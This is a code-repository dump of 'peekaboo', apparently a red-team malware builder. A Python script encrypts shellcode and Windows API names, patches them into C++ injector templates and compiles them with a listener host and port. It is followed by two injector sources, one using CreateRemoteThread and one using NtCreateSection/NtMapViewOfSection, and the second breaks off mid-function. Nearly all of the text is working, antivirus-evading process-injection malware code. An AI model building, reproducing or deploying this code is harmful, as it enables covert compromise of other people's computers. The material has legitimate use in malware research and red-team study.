encryptor.xor_encrypt(f_p32f, encryptor.func_key()) 298 | ciphertext_p32n, p32n_key = encryptor.xor_encrypt(f_p32n, encryptor.func_key()) 299 | ciphertext_zw, zw_key = encryptor.xor_encrypt(f_zw, encryptor.func_key()) 300 | ciphertext_ct32s, ct32s_key = encryptor.xor_encrypt(f_ct32s, encryptor.func_key()) 301 | ciphertext_proc, proc_key = encryptor.xor_encrypt(proc_name, encryptor.proc_key()) 302 | ciphertext_k32, k32_key = encryptor.xor_encrypt(k32_name, encryptor.dll_key()) 303 | ciphertext_ntd, ntd_key = encryptor.xor_encrypt(ntdll_name, encryptor.dll_key()) 304 | 305 | kernel32_hash = hasher.hashing("kernel32.dll") 306 | getmodulehandle_hash = hasher.hashing("GetModuleHandleA") 307 | getprocaddress_hash = hasher.hashing("GetProcAddress") 308 | 309 | tmp = open("peekaboo_nt.cpp", "rt") 310 | data = tmp.read() 311 | 312 | data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext) 313 | data = data.replace('unsigned char s_ntop[] = { };', 'unsigned char s_ntop[] = ' + ciphertext_ntop) 314 | data = data.replace('unsigned char s_ntcs[] = { };', 'unsigned char s_ntcs[] = ' + ciphertext_ntcs) 315 | data = data.replace('unsigned char s_wfso[] = { };', 'unsigned char s_wfso[] = ' + ciphertext_wfso) 316 | data = data.replace('unsigned char s_ntmvos[] = { };', 'unsigned char s_ntmvos[] = ' + ciphertext_ntmvos) 317 | data = data.replace('unsigned char s_zw[] = { };', 'unsigned char s_zw[] = ' + ciphertext_zw) 318 | data = data.replace('unsigned char s_rcut[] = { };', 'unsigned char s_rcut[] = ' + ciphertext_rcut) 319 | data = data.replace('unsigned char s_clh[] = { };', 'unsigned char s_clh[] = ' + ciphertext_clh) 320 | data = data.replace('unsigned char s_p32f[] = { };', 'unsigned char s_p32f[] = ' + ciphertext_p32f) 321 | data = data.replace('unsigned char s_p32n[] = { };', 'unsigned char s_p32n[] = ' + ciphertext_p32n) 322 | data = data.replace('unsigned char s_ct32s[] = { };', 'unsigned char s_ct32s[] = ' + ciphertext_ct32s) 323 | data = data.replace('unsigned char my_proc[] = { };', 'unsigned char my_proc[] = ' + ciphertext_proc) 324 | data = data.replace('unsigned char s_k32[] = { };', 'unsigned char s_k32[] = ' + ciphertext_k32) 325 | data = data.replace('unsigned char s_ntd[] = { };', 'unsigned char s_ntd[] = ' + ciphertext_ntd) 326 | 327 | data = data.replace('char my_payload_key[] = "";', 'char my_payload_key[] = "' + p_key + '";') 328 | data = data.replace('char my_proc_key[] = "";', 'char my_proc_key[] = "' + proc_key + '";') 329 | data = data.replace('char s_ntop_key[] = "";', 'char s_ntop_key[] = "' + ntop_key + '";') 330 | data = data.replace('char s_ntcs_key[] = "";', 'char s_ntcs_key[] = "' + ntcs_key + '";') 331 | data = data.replace('char s_ntmvos_key[] = "";', 'char s_ntmvos_key[] = "' + ntmvos_key + '";') 332 | data = data.replace('char s_zw_key[] = "";', 'char s_zw_key[] = "' + zw_key + '";') 333 | data = data.replace('char s_rcut_key[] = "";', 'char s_rcut_key[] = "' + rcut_key + '";') 334 | data = data.replace('char s_wfso_key[] = "";', 'char s_wfso_key[] = "' + wfso_key + '";') 335 | data = data.replace('char s_clh_key[] = "";', 'char s_clh_key[] = "' + clh_key + '";') 336 | data = data.replace('char s_p32f_key[] = "";', 'char s_p32f_key[] = "' + p32f_key + '";') 337 | data = data.replace('char s_p32n_key[] = "";', 'char s_p32n_key[] = "' + p32n_key + '";') 338 | data = data.replace('char s_ct32s_key[] = "";', 'char s_ct32s_key[] = "' + ct32s_key + '";') 339 | data = data.replace('char k32_key[] = "";', 'char k32_key[] = "' + k32_key + '";') 340 | data = data.replace('char ntd_key[] = "";', 'char ntd_key[] = "' + ntd_key + '";') 341 | data = data.replace('XOR(', f_xor + "(") 342 | data = data.replace("findMyProc(", f_ftt + "(") 343 | 344 | print (Colors.BLUE + "calculating win API hashes..." + Colors.ENDC) 345 | data = data.replace('#define KERNEL32_HASH 0x00000000', '#define KERNEL32_HASH ' + str(kernel32_hash)) 346 | data = data.replace('#define GETMODULEHANDLE_HASH 0x00000000', '#define GETMODULEHANDLE_HASH ' + str(getmodulehandle_hash)) 347 | data = data.replace('#define GETPROCADDRESS_HASH 0x00000000', '#define GETPROCADDRESS_HASH ' + str(getprocaddress_hash)) 348 | 349 | if mode == "console": 350 | data = data.replace("int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {", "int main(void) {") 351 | 352 | tmp.close() 353 | tmp = open("peekaboo-enc.cpp", "w+") 354 | tmp.write(data) 355 | tmp.close() 356 | 357 | print (Colors.GREEN + "successfully encrypt template file :)" + Colors.ENDC) 358 | 359 | print (Colors.BLUE + "compiling..." + Colors.ENDC) 360 | try: 361 | cmd = "x86_64-w64-mingw32-g++ -O2 peekaboo-enc.cpp -o peekaboo.exe -m" + mode + " -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1" 362 | os.system(cmd) 363 | os.remove("peekaboo-enc.cpp") 364 | except: 365 | print (Colors.RED + "error compiling template :(" + Colors.ENDC) 366 | sys.exit() 367 | else: 368 | print (Colors.YELLOW + cmd + Colors.ENDC) 369 | print (Colors.GREEN + "successfully compiled :)" + Colors.ENDC) 370 | 371 | if __name__ == "__main__": 372 | parser = argparse.ArgumentParser() 373 | parser.add_argument('-l','--lhost', required = True, help = "local IP") 374 | parser.add_argument('-p','--lport', required = True, help = "local port", default = '4444') 375 | parser.add_argument('-b', '--build', required = True, help = "build injector or dll", default = '1') 376 | parser.add_argument('-e', '--proc', required = False, help = "process name", default = "notepad.exe") 377 | parser.add_argument("-m", '--mode', required = False, help = "console or windows app", default = "windows") 378 | args = vars(parser.parse_args()) 379 | host, port = args['lhost'], args['lport'] 380 | build = args['build'] 381 | proc_name, mode = args['proc'], args['mode'] 382 | run_peekaboo(host, port, build, proc_name, mode) 383 | -------------------------------------------------------------------------------- /peekaboo_inj.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | @cocomelonc inspired by RTO malware development course 3 | */ 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define KERNEL32_HASH 0x00000000 11 | #define GETMODULEHANDLE_HASH 0x00000000 12 | #define GETPROCADDRESS_HASH 0x00000000 13 | 14 | // shellcode - 64-bit 15 | unsigned char my_payload[] = { }; 16 | 17 | // encrypted process name 18 | unsigned char my_proc[] = { }; 19 | 20 | // encrypted functions 21 | unsigned char s_vaex[] = { }; 22 | unsigned char s_cth[] = { }; 23 | unsigned char s_wfso[] = { }; 24 | unsigned char s_wpm[] = { }; 25 | unsigned char s_op[] = { }; 26 | unsigned char s_clh[] = { }; 27 | unsigned char s_p32f[] = { }; 28 | unsigned char s_p32n[] = { }; 29 | unsigned char s_ct32s[] = { }; 30 | 31 | // encrypted kernel32.dll 32 | unsigned char s_k32[] = { }; 33 | 34 | // length 35 | unsigned int my_payload_len = sizeof(my_payload); 36 | unsigned int my_proc_len = sizeof(my_proc); 37 | unsigned int s_vaex_len = sizeof(s_vaex); 38 | unsigned int s_cth_len = sizeof(s_cth); 39 | unsigned int s_wfso_len = sizeof(s_wfso); 40 | unsigned int s_wpm_len = sizeof(s_wpm); 41 | unsigned int s_op_len = sizeof(s_op); 42 | unsigned int s_clh_len = sizeof(s_clh); 43 | unsigned int s_p32f_len = sizeof(s_p32f); 44 | unsigned int s_p32n_len = sizeof(s_p32n); 45 | unsigned int s_ct32s_len = sizeof(s_ct32s); 46 | unsigned int s_k32_len = sizeof(s_k32); 47 | 48 | // keys 49 | char my_payload_key[] = ""; 50 | char my_proc_key[] = ""; 51 | char s_vaex_key[] = ""; 52 | char s_cth_key[] = ""; 53 | char s_wfso_key[] = ""; 54 | char s_wpm_key[] = ""; 55 | char s_op_key[] = ""; 56 | char s_clh_key[] = ""; 57 | char s_p32f_key[] = ""; 58 | char s_p32n_key[] = ""; 59 | char s_ct32s_key[] = ""; 60 | char k32_key[] = ""; 61 | 62 | typedef struct _UNICODE_STRING { 63 | USHORT Length; 64 | USHORT MaximumLength; 65 | PWSTR Buffer; 66 | } UNICODE_STRING; 67 | 68 | struct LDR_MODULE { 69 | LIST_ENTRY e[3]; 70 | HMODULE base; 71 | void* entry; 72 | UINT size; 73 | UNICODE_STRING dllPath; 74 | UNICODE_STRING dllname; 75 | }; 76 | 77 | typedef HMODULE (WINAPI *pGetModuleHandleA)( 78 | LPCSTR lpModuleName 79 | ); 80 | 81 | typedef FARPROC (WINAPI *pGetProcAddress)( 82 | HMODULE hModule, 83 | LPCSTR lpProcName 84 | ); 85 | 86 | typedef LPVOID (WINAPI * pVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 87 | typedef HANDLE (WINAPI * pCreateRemoteThread)( 88 | HANDLE hProcess, 89 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 90 | SIZE_T dwStackSize, 91 | LPTHREAD_START_ROUTINE lpStartAddress, 92 | LPVOID lpParameter, 93 | DWORD dwCreationFlags, 94 | LPDWORD lpThreadId 95 | ); 96 | typedef DWORD (WINAPI * pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds); 97 | typedef BOOL (WINAPI * pWriteProcessMemory)( 98 | HANDLE hProcess, 99 | LPVOID lpBaseAddress, 100 | LPCVOID lpBuffer, 101 | SIZE_T nSize, 102 | SIZE_T *lpNumberOfBytesWritten 103 | ); 104 | typedef HANDLE (WINAPI * pOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); 105 | typedef BOOL (WINAPI * pCloseHandle)(HANDLE hObject); 106 | typedef BOOL (WINAPI * pProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 107 | typedef BOOL (WINAPI * pProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 108 | typedef HANDLE (WINAPI * pCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID); 109 | 110 | void XOR(char * data, size_t data_len, char * key, size_t key_len) { 111 | int j; 112 | j = 0; 113 | for (int i = 0; i < data_len; i++) { 114 | if (j == key_len - 1) j = 0; 115 | data[i] = data[i] ^ key[j]; 116 | j++; 117 | } 118 | } 119 | 120 | DWORD calcMyHash(char* data) { 121 | DWORD hash = 0x35; 122 | for (int i = 0; i < strlen(data); i++) { 123 | hash += data[i] + (hash << 1); 124 | } 125 | return hash; 126 | } 127 | 128 | static DWORD calcMyHashBase(LDR_MODULE* mdll) { 129 | char name[64]; 130 | size_t i = 0; 131 | 132 | while (mdll->dllname.Buffer[i] && i < sizeof(name) - 1) { 133 | name[i] = (char)mdll->dllname.Buffer[i]; 134 | i++; 135 | } 136 | name[i] = 0; 137 | return calcMyHash((char *)CharLowerA(name)); 138 | } 139 | 140 | static HMODULE getKernel32(DWORD myHash) { 141 | HMODULE kernel32; 142 | INT_PTR peb = __readgsqword(0x60); 143 | auto modList = 0x18; 144 | auto modListFlink = 0x18; 145 | auto kernelBaseAddr = 0x10; 146 | 147 | auto mdllist = *(INT_PTR*)(peb + modList); 148 | auto mlink = *(INT_PTR*)(mdllist + modListFlink); 149 | auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr); 150 | auto mdl = (LDR_MODULE*)mlink; 151 | do { 152 | mdl = (LDR_MODULE*)mdl->e[0].Flink; 153 | if (mdl->base != nullptr) { 154 | if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash 155 | break; 156 | } 157 | } 158 | } while (mlink != (INT_PTR)mdl); 159 | 160 | kernel32 = (HMODULE)mdl->base; 161 | return kernel32; 162 | } 163 | 164 | static LPVOID getAPIAddr(HMODULE h, DWORD myHash) { 165 | PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h; 166 | PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header->e_lfanew); 167 | PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)( 168 | (LPBYTE)h + img_nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 169 | PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt->AddressOfFunctions); 170 | PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt->AddressOfNames); 171 | PWORD fOrd = (PWORD)((LPBYTE)h + img_edt->AddressOfNameOrdinals); 172 | 173 | for (DWORD i = 0; i < img_edt->AddressOfFunctions; i++) { 174 | LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]); 175 | 176 | if (calcMyHash(pFuncName) == myHash) { 177 | // printf("successfully found! %s - %d\n", pFuncName, myHash); 178 | return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]); 179 | } 180 | } 181 | return nullptr; 182 | } 183 | 184 | int findMyProc(const char *procname) { 185 | HANDLE hProcSnap; 186 | PROCESSENTRY32 pe32; 187 | int pid = 0; 188 | 189 | HMODULE mod = getKernel32(KERNEL32_HASH); 190 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 191 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 192 | HMODULE hk32 = myGetModuleHandleA(s_k32); 193 | pCloseHandle myCloseHandle = (pCloseHandle)myGetProcAddress(hk32, s_clh); 194 | 195 | XOR((char *) s_p32f, s_p32f_len, s_p32f_key, sizeof(s_p32f_key)); 196 | pProcess32First myProcess32First = (pProcess32First)myGetProcAddress(hk32, s_p32f); 197 | 198 | XOR((char *) s_p32n, s_p32n_len, s_p32n_key, sizeof(s_p32n_key)); 199 | pProcess32Next myProcess32Next = (pProcess32Next)myGetProcAddress(hk32, s_p32n); 200 | 201 | XOR((char *) s_ct32s, s_ct32s_len, s_ct32s_key, sizeof(s_ct32s_key)); 202 | pCreateToolhelp32Snapshot myCreateToolhelp32Snapshot = (pCreateToolhelp32Snapshot)myGetProcAddress(hk32, s_ct32s); 203 | 204 | hProcSnap = myCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 205 | if (INVALID_HANDLE_VALUE == hProcSnap) return 0; 206 | 207 | pe32.dwSize = sizeof(PROCESSENTRY32); 208 | 209 | if (!myProcess32First(hProcSnap, &pe32)) { 210 | myCloseHandle(hProcSnap); 211 | return 0; 212 | } 213 | 214 | while (myProcess32Next(hProcSnap, &pe32)) { 215 | if (lstrcmpiA(procname, pe32.szExeFile) == 0) { 216 | pid = pe32.th32ProcessID; 217 | break; 218 | } 219 | } 220 | 221 | myCloseHandle(hProcSnap); 222 | 223 | return pid; 224 | } 225 | 226 | 227 | int pekabooo(HANDLE hProc, unsigned char * payload, unsigned int payload_len) { 228 | 229 | LPVOID pRemoteCode = NULL; 230 | HANDLE hThread = NULL; 231 | 232 | HMODULE mod = getKernel32(KERNEL32_HASH); 233 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 234 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 235 | HMODULE hk32 = myGetModuleHandleA(s_k32); 236 | 237 | // decrypt VirtualAllocEx function call 238 | XOR((char *) s_vaex, s_vaex_len, s_vaex_key, sizeof(s_vaex_key)); 239 | pVirtualAllocEx myVirtualAllocEx = (pVirtualAllocEx)myGetProcAddress(hk32, s_vaex); 240 | pRemoteCode = myVirtualAllocEx(hProc, NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READ); 241 | 242 | // decrypt WriteProcessMemory function call 243 | XOR((char *) s_wpm, s_wpm_len, s_wpm_key, sizeof(s_wpm_key)); 244 | pWriteProcessMemory myWriteProcessMemory = (pWriteProcessMemory)myGetProcAddress(hk32, s_wpm); 245 | myWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); 246 | 247 | // decrypt CreateRemoteThread function call 248 | XOR((char *) s_cth, s_cth_len, s_cth_key, sizeof(s_cth_key)); 249 | pCreateRemoteThread myCreateRemoteThread = (pCreateRemoteThread)myGetProcAddress(hk32, s_cth); 250 | hThread = myCreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); 251 | 252 | if (hThread != NULL) { 253 | // decrypt WaitForSingleObject function call 254 | XOR((char *) s_wfso, s_wfso_len, s_wfso_key, sizeof(s_wfso_key)); 255 | pWaitForSingleObject myWaitForSingleObject = (pWaitForSingleObject)myGetProcAddress(hk32, s_wfso); 256 | myWaitForSingleObject(hThread, 500); 257 | 258 | pCloseHandle myCloseHandle = (pCloseHandle)myGetProcAddress(hk32, s_clh); 259 | myCloseHandle(hThread); 260 | return 0; 261 | } 262 | return -1; 263 | } 264 | 265 | 266 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 267 | 268 | int pid = 0; 269 | HANDLE hProc = NULL; 270 | 271 | HMODULE mod = getKernel32(KERNEL32_HASH); 272 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 273 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 274 | 275 | // decrypt kernel32.dll 276 | XOR((char *) s_k32, s_k32_len, k32_key, sizeof(k32_key)); 277 | HMODULE hk32 = myGetModuleHandleA(s_k32); 278 | 279 | // decrypt CloseHandle function call 280 | XOR((char *) s_clh, s_clh_len, s_clh_key, sizeof(s_clh_key)); 281 | pCloseHandle myCloseHandle = (pCloseHandle)myGetProcAddress(hk32, s_clh); 282 | 283 | // decrypt process name 284 | XOR((char *) my_proc, my_proc_len, my_proc_key, sizeof(my_proc_key)); 285 | 286 | pid = findMyProc(my_proc); 287 | 288 | if (pid) { 289 | // decrypt OpenProcess function call 290 | XOR((char *) s_op, s_op_len, s_op_key, sizeof(s_op_key)); 291 | pOpenProcess myOpenProcess = (pOpenProcess)myGetProcAddress(hk32, s_op); 292 | 293 | // try to open target process 294 | hProc = myOpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 295 | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, 296 | FALSE, (DWORD) pid); 297 | 298 | if (hProc != NULL) { 299 | XOR((char *) my_payload, my_payload_len, my_payload_key, sizeof(my_payload_key)); 300 | pekabooo(hProc, my_payload, my_payload_len); 301 | myCloseHandle(hProc); 302 | } 303 | } 304 | return 0; 305 | } 306 | -------------------------------------------------------------------------------- /peekaboo_nt.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * peekaboo_nt.cpp 3 | * advanced code injection technique via NtCreateSection and NtMapViewOfSection 4 | * author @cocomelonc 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #pragma comment(lib, "ntdll") 12 | #pragma comment(lib, "advapi32.lib") 13 | 14 | // #define NTDLL_HASH 0x00000000 15 | #define KERNEL32_HASH 0x00000000 16 | #define GETMODULEHANDLE_HASH 0x00000000 17 | #define GETPROCADDRESS_HASH 0x00000000 18 | 19 | #define InitializeObjectAttributes(p,n,a,r,s) { \ 20 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ 21 | (p)->RootDirectory = (r); \ 22 | (p)->Attributes = (a); \ 23 | (p)->ObjectName = (n); \ 24 | (p)->SecurityDescriptor = (s); \ 25 | (p)->SecurityQualityOfService = NULL; \ 26 | } 27 | 28 | // shellcode 64-bit (encrypted) 29 | unsigned char my_payload[] = { }; 30 | 31 | // encrypted process name 32 | unsigned char my_proc[] = { }; 33 | 34 | // encrypted functions 35 | unsigned char s_ntop[] = { }; 36 | unsigned char s_p32f[] = { }; 37 | unsigned char s_p32n[] = { }; 38 | unsigned char s_ct32s[] = { }; 39 | unsigned char s_clh[] = { }; 40 | unsigned char s_wfso[] = { }; 41 | 42 | unsigned char s_ntcs[] = { }; 43 | unsigned char s_ntmvos[] = { }; 44 | unsigned char s_rcut[] = { }; 45 | unsigned char s_zw[] = { }; 46 | 47 | // encrypted DLL names (kernel32.dll, ntdll.dll) 48 | unsigned char s_k32[] = { }; 49 | unsigned char s_ntd[] = { }; 50 | 51 | // length 52 | unsigned int my_payload_len = sizeof(my_payload); 53 | unsigned int my_proc_len = sizeof(my_proc); 54 | unsigned int s_ntop_len = sizeof(s_ntop); 55 | unsigned int s_p32f_len = sizeof(s_p32f); 56 | unsigned int s_p32n_len = sizeof(s_p32n); 57 | unsigned int s_ct32s_len = sizeof(s_ct32s); 58 | unsigned int s_clh_len = sizeof(s_clh); 59 | unsigned int s_wfso_len = sizeof(s_wfso); 60 | unsigned int s_k32_len = sizeof(s_k32); 61 | unsigned int s_ntd_len = sizeof(s_ntd); 62 | unsigned int s_ntcs_len = sizeof(s_ntcs); 63 | unsigned int s_ntmvos_len = sizeof(s_ntmvos); 64 | unsigned int s_rcut_len = sizeof(s_rcut); 65 | unsigned int s_zw_len = sizeof(s_zw); 66 | 67 | 68 | // keys 69 | char my_payload_key[] = ""; 70 | char my_proc_key[] = ""; 71 | char s_ntop_key[] = ""; 72 | char s_ntcs_key[] = ""; 73 | char s_ntmvos_key[] = ""; 74 | char s_rcut_key[] = ""; 75 | char s_zw_key[] = ""; 76 | char s_clh_key[] = ""; 77 | char s_wfso_key[] = ""; 78 | char s_p32f_key[] = ""; 79 | char s_p32n_key[] = ""; 80 | char s_ct32s_key[] = ""; 81 | char k32_key[] = ""; 82 | char ntd_key[] = ""; 83 | 84 | // dt nt!_UNICODE_STRING 85 | typedef struct _LSA_UNICODE_STRING { 86 | USHORT Length; 87 | USHORT MaximumLength; 88 | PWSTR Buffer; 89 | } UNICODE_STRING, * PUNICODE_STRING; 90 | 91 | // dt nt!_OBJECT_ATTRIBUTES 92 | typedef struct _OBJECT_ATTRIBUTES { 93 | ULONG Length; 94 | HANDLE RootDirectory; 95 | PUNICODE_STRING ObjectName; 96 | ULONG Attributes; 97 | PVOID SecurityDescriptor; 98 | PVOID SecurityQualityOfService; 99 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 100 | 101 | // dt nt!_CLIENT_ID 102 | typedef struct _CLIENT_ID { 103 | PVOID UniqueProcess; 104 | PVOID UniqueThread; 105 | } CLIENT_ID, *PCLIENT_ID; 106 | 107 | struct LDR_MODULE { 108 | LIST_ENTRY e[3]; 109 | HMODULE base; 110 | void* entry; 111 | UINT size; 112 | UNICODE_STRING dllPath; 113 | UNICODE_STRING dllname; 114 | }; 115 | 116 | typedef HMODULE (WINAPI *pGetModuleHandleA)( 117 | LPCSTR lpModuleName 118 | ); 119 | 120 | typedef FARPROC (WINAPI *pGetProcAddress)( 121 | HMODULE hModule, 122 | LPCSTR lpProcName 123 | ); 124 | 125 | // NtCreateSection syntax 126 | typedef NTSTATUS(NTAPI* pNtCreateSection)( 127 | OUT PHANDLE SectionHandle, 128 | IN ULONG DesiredAccess, 129 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 130 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 131 | IN ULONG PageAttributess, 132 | IN ULONG SectionAttributes, 133 | IN HANDLE FileHandle OPTIONAL 134 | ); 135 | 136 | // NtMapViewOfSection syntax 137 | typedef NTSTATUS(NTAPI* pNtMapViewOfSection)( 138 | HANDLE SectionHandle, 139 | HANDLE ProcessHandle, 140 | PVOID* BaseAddress, 141 | ULONG_PTR ZeroBits, 142 | SIZE_T CommitSize, 143 | PLARGE_INTEGER SectionOffset, 144 | PSIZE_T ViewSize, 145 | DWORD InheritDisposition, 146 | ULONG AllocationType, 147 | ULONG Win32Protect 148 | ); 149 | 150 | // RtlCreateUserThread syntax 151 | typedef NTSTATUS(NTAPI* pRtlCreateUserThread)( 152 | IN HANDLE ProcessHandle, 153 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, 154 | IN BOOLEAN CreateSuspended, 155 | IN ULONG StackZeroBits, 156 | IN OUT PULONG StackReserved, 157 | IN OUT PULONG StackCommit, 158 | IN PVOID StartAddress, 159 | IN PVOID StartParameter OPTIONAL, 160 | OUT PHANDLE ThreadHandle, 161 | OUT PCLIENT_ID ClientID 162 | ); 163 | 164 | // NtOpenProcess syntax 165 | typedef NTSTATUS(NTAPI* pNtOpenProcess)( 166 | PHANDLE ProcessHandle, 167 | ACCESS_MASK AccessMask, 168 | POBJECT_ATTRIBUTES ObjectAttributes, 169 | PCLIENT_ID ClientID 170 | ); 171 | 172 | // ZwUnmapViewOfSection syntax 173 | typedef NTSTATUS(NTAPI* pZwUnmapViewOfSection)( 174 | HANDLE ProcessHandle, 175 | PVOID BaseAddress 176 | ); 177 | 178 | // BOOL (WINAPI * pCloseHandle)(HANDLE hObject); 179 | // BOOL (WINAPI * pProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 180 | // BOOL (WINAPI * pProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 181 | // HANDLE (WINAPI * pCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID); 182 | // DWORD (WINAPI * pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds); 183 | 184 | typedef BOOL (WINAPI * pCloseHandle)(HANDLE hObject); 185 | typedef BOOL (WINAPI * pProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 186 | typedef BOOL (WINAPI * pProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe); 187 | typedef HANDLE (WINAPI * pCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID); 188 | typedef DWORD (WINAPI * pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds); 189 | 190 | // decryption 191 | void XOR(char * data, size_t data_len, char * key, size_t key_len) { 192 | int j; 193 | j = 0; 194 | for (int i = 0; i < data_len; i++) { 195 | if (j == key_len - 1) j = 0; 196 | data[i] = data[i] ^ key[j]; 197 | j++; 198 | } 199 | } 200 | 201 | DWORD calcMyHash(char* data) { 202 | DWORD hash = 0x35; 203 | for (int i = 0; i < strlen(data); i++) { 204 | hash += data[i] + (hash << 1); 205 | } 206 | return hash; 207 | } 208 | 209 | static DWORD calcMyHashBase(LDR_MODULE* mdll) { 210 | char name[64]; 211 | size_t i = 0; 212 | 213 | while (mdll->dllname.Buffer[i] && i < sizeof(name) - 1) { 214 | name[i] = (char)mdll->dllname.Buffer[i]; 215 | i++; 216 | } 217 | name[i] = 0; 218 | return calcMyHash((char *)CharLowerA(name)); 219 | } 220 | 221 | static HMODULE getKernel32(DWORD myHash) { 222 | HMODULE kernel32; 223 | INT_PTR peb = __readgsqword(0x60); 224 | auto modList = 0x18; 225 | auto modListFlink = 0x18; 226 | auto kernelBaseAddr = 0x10; 227 | 228 | auto mdllist = *(INT_PTR*)(peb + modList); 229 | auto mlink = *(INT_PTR*)(mdllist + modListFlink); 230 | auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr); 231 | auto mdl = (LDR_MODULE*)mlink; 232 | do { 233 | mdl = (LDR_MODULE*)mdl->e[0].Flink; 234 | if (mdl->base != nullptr) { 235 | if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash 236 | break; 237 | } 238 | } 239 | } while (mlink != (INT_PTR)mdl); 240 | 241 | kernel32 = (HMODULE)mdl->base; 242 | return kernel32; 243 | } 244 | 245 | static LPVOID getAPIAddr(HMODULE h, DWORD myHash) { 246 | PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h; 247 | PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header->e_lfanew); 248 | PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)( 249 | (LPBYTE)h + img_nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 250 | PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt->AddressOfFunctions); 251 | PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt->AddressOfNames); 252 | PWORD fOrd = (PWORD)((LPBYTE)h + img_edt->AddressOfNameOrdinals); 253 | 254 | for (DWORD i = 0; i < img_edt->AddressOfFunctions; i++) { 255 | LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]); 256 | 257 | if (calcMyHash(pFuncName) == myHash) { 258 | // printf("successfully found! %s - %d\n", pFuncName, myHash); 259 | return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]); 260 | } 261 | } 262 | return nullptr; 263 | } 264 | 265 | // get process PID 266 | int findMyProc(const char *procname) { 267 | 268 | HANDLE hSnapshot; 269 | PROCESSENTRY32 pe; 270 | int pid = 0; 271 | BOOL hResult; 272 | 273 | HMODULE mod = getKernel32(KERNEL32_HASH); 274 | pGetModuleHandleA myGetModuleHandleA = (pGetModuleHandleA)getAPIAddr(mod, GETMODULEHANDLE_HASH); 275 | pGetProcAddress myGetProcAddress = (pGetProcAddress)getAPIAddr(mod, GETPROCADDRESS_HASH); 276 | HMODULE hk32 = myGetModuleHandleA(s_k32); 277 | pCloseHandle myCloseHandle = (pCloseHandle)myGetProcAddress(hk32, s_clh); 278 | 279 | XOR((char *) s_p32f, s_p32f_len, s_p32f_key, sizeof(s_p32f_key)); 280 | pProcess32First myProcess32First = (pProcess32First)myGetProcAddress(hk32, s_p32f); 281 | 282 | XOR((char *) s_p32n, 